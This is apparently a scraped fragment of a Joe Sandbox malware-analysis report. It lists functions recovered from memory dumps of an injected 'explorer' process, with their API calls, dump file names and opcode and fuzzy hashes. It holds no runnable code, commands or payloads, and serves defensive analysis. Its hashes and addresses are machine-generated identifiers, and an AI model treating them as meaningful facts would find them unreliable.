                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.6
                                                                                                                                                                                                                        • API String ID: 2800961625-471037017
                                                                                                                                                                                                                        • Opcode ID: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction ID: 71c7f0091db432393197cef76ed86e7ae2800236ba2ff78fb2312a45266380fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93413332614B919AE720DF61D8443EE77A5FB88788F844115EA4D47E68EF7DC249CB40
                                                                                                                                                                                                                        Function 0DFC4947 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFC4972
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0DFC499B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFC49FC
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFC494F
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _getptd_noexit.LIBCMT ref: 0DFC28A2
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _amsg_exit.LIBCMT ref: 0DFC28B2
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFC4A01
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFC4A0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: cb4ab2455fc65eedca18c0ea40d1ed3f6558577b8dd6469572bf3e67efc9a5d4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA21653760468286C730DF1AE5503AE7760F389BA5F05D21ADF9A07B54CF3AE896CB05
                                                                                                                                                                                                                        Function 0E124947 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E124972
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0E12499B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E1249FC
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E12494F
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _getptd_noexit.LIBCMT ref: 0E1228A2
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _amsg_exit.LIBCMT ref: 0E1228B2
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E124A01
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E124A0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 1e13caa0cc2a32849cbbb69a801d347633af7313891681941c4681b4a9dca135
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D2151362006A186D731DF56E44039EB7A0F388BA5F14462ADFAA07B54CB3AD8D6CB01
                                                                                                                                                                                                                        Function 0FF64947 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0FF64972
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0FF6499B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0FF649FC
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF6494F
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _getptd_noexit.LIBCMT ref: 0FF628A2
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _amsg_exit.LIBCMT ref: 0FF628B2
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF64A01
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF64A0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 26478bb308a1a8da90186fdfabaa24a6f78ca78d19d74a13f394dcafd38e203c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9421213660478186D730DF16E44036EB760F789BA9F544222DF9947B96CF3EE486CB05
                                                                                                                                                                                                                        Function 0DFBD9B8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFBD9D5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFBD9CA
                                                                                                                                                                                                                          • Part of subcall function 0DFBF7C0: _getptd_noexit.LIBCMT ref: 0DFBF7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DFBDA1D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFBDA2C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFBDA37
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction ID: a79e6b3f055af517296cb102c7a27ad54323989313411b3c31d15cb303f40bd6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A210A62B0C38182DB25576F9D803B97654B744BF4F14C225EB5B0BB99CA6CC9518B02
                                                                                                                                                                                                                        Function 0E11D9B8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E11D9D5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E11D9CA
                                                                                                                                                                                                                          • Part of subcall function 0E11F7C0: _getptd_noexit.LIBCMT ref: 0E11F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E11DA1D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E11DA2C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E11DA37
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction ID: b7d0f046b25e730d796b6687e249cea88527e2c0c651aebb87b582ae5d5ba46d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3213BA27093D582DF25D766B49032A6690B7887E1F6447B5EA9A07B98CB7CCDC18B00
                                                                                                                                                                                                                        Function 0FF5D9B8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF5D9D5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF5D9CA
                                                                                                                                                                                                                          • Part of subcall function 0FF5F7C0: _getptd_noexit.LIBCMT ref: 0FF5F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0FF5DA1D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF5DA2C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF5DA37
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction ID: 5edb036aa00e1d9af180155f46fec0bcab275a08b7da03981cc599b9d53c5d97
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C721F9A3B0E3C182DF255BA5998033E7660BB44FD4F944261EF9A4BB9BDE6CC541CB00
                                                                                                                                                                                                                        Function 0DFB0C10 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 91b3dae27dcb76e74acb243b2bbc3a773a63738140735dbff53731b8c22fd2a8
                                                                                                                                                                                                                        • Instruction ID: c6e7cb195e945c0a3bc53b0df349b23d5a286e6c945e402c62939d6a09a16fda
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91b3dae27dcb76e74acb243b2bbc3a773a63738140735dbff53731b8c22fd2a8
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B117961704B5286EB549FA6B94037AB3A0FB89FD4F088136DE8B53B68DF7CC0448B00
                                                                                                                                                                                                                        Function 0E110C10 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction ID: d44ede6d98a8e075eb1e8b8cd0c9d36b2efb0b6f2085dada6f8bd5ad22a2a2d8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E116A71604B8086EB549F63E9103AAB3A0FB8CFD1F480825DE8A63B58DF3CC1808B01
                                                                                                                                                                                                                        Function 0FF50C10 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction ID: be2f0cfd2d276b819f575bf71aadbb4acf9d631af08f107e572959828220b02d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95112961704B8286EB649F62B95437AB3A5FF89FD4F8840359E8A57B15DF3CC1468B00
                                                                                                                                                                                                                        Function 0DFB0660 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 929abbbedb95f8e168d103e21051bd23e2847469a7dec5fc2b114ceb9a50bd9c
                                                                                                                                                                                                                        • Instruction ID: ed63bc48831fb66f999a57dbd657fd3abff5531ab327fd73f27dfab70d68919b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 929abbbedb95f8e168d103e21051bd23e2847469a7dec5fc2b114ceb9a50bd9c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE315976614A8186DA10DFAAE84436AB7A5F789BD8F548026DF8E53B28DF7CC145CB00
                                                                                                                                                                                                                        Function 0E110660 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction ID: 056831225f0913be261d7304dfef89d1c3dc42d9d7c9232c4a0af5e17bd99003
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB3155B6A14B8186DB10DFA6E84439AB7A4F788BC8F554425EF8E53B18DF7CC485CB00
                                                                                                                                                                                                                        Function 0FF50660 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction ID: 1770e66cbbc5411cbb3d65dedd3ba69b240708d356d6c8b1570af95e066fbdfe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B313B76614B8286DA10DF66E84436AB7A5FB88FC4F845125DF8E57B15DF3CD08ACB00
                                                                                                                                                                                                                        Function 0DEFB7D5 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEFB800
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFB7F5
                                                                                                                                                                                                                          • Part of subcall function 0DEEF0F5: _getptd_noexit.LIBCMT ref: 0DEEF0F9
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFB8A3
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEFB8AE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 7290e0230d8fda92185e52709cc6476222a6bdbccc155bcfa025caacb33c8ca9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE417031518F9E8BCB28AB19C4502B673D0FF84329B95666FE6DAD7194EF24C841C781
                                                                                                                                                                                                                        Function 0824B7D5 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824B800
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824B7F5
                                                                                                                                                                                                                          • Part of subcall function 0823F0F5: _getptd_noexit.LIBCMT ref: 0823F0F9
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824B8A3
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824B8AE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 8327923c1365ba87185b0384558adcbba69d1bcab72108eb51a4c6fbba08a6ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25412B34538B5F8BCB2CABA980501B673D0FB54333B98522FE4D6C7194EA64C843D7A1
                                                                                                                                                                                                                        Function 0E0AB7D5 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0AB800
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AB7F5
                                                                                                                                                                                                                          • Part of subcall function 0E09F0F5: _getptd_noexit.LIBCMT ref: 0E09F0F9
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AB8A3
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0AB8AE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
